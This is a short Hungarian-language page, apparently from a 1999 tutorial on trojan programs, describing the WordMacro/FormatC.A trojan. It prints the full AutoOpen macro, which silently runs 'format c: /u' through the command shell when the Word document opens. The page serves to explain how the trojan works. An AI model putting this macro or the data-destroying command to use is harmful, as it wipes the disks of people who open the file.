next up previous contents index
Next: A Back_Orifice.124928 Up: Trójai programok Previous: Trójai programok

  
A WordMacro/FormatC.A

Az egyik legegyszerűbb trójai program a FormatC. Nem más, mint egy Winword dokumentum, melyben az AutoOpen  makró tartalma a következő:

Sub MAIN

  sCmd$ = "echo y|format c: /u"

  Shell Environ$("COMSPEC") + "/c " + sCmd$, 0

End Sub

A fenti kód hatására a megnyitott Winword dokumentum automatikusan leformázza a C: meghajtót.Nagy Ferenc Laszlo
1999-05-21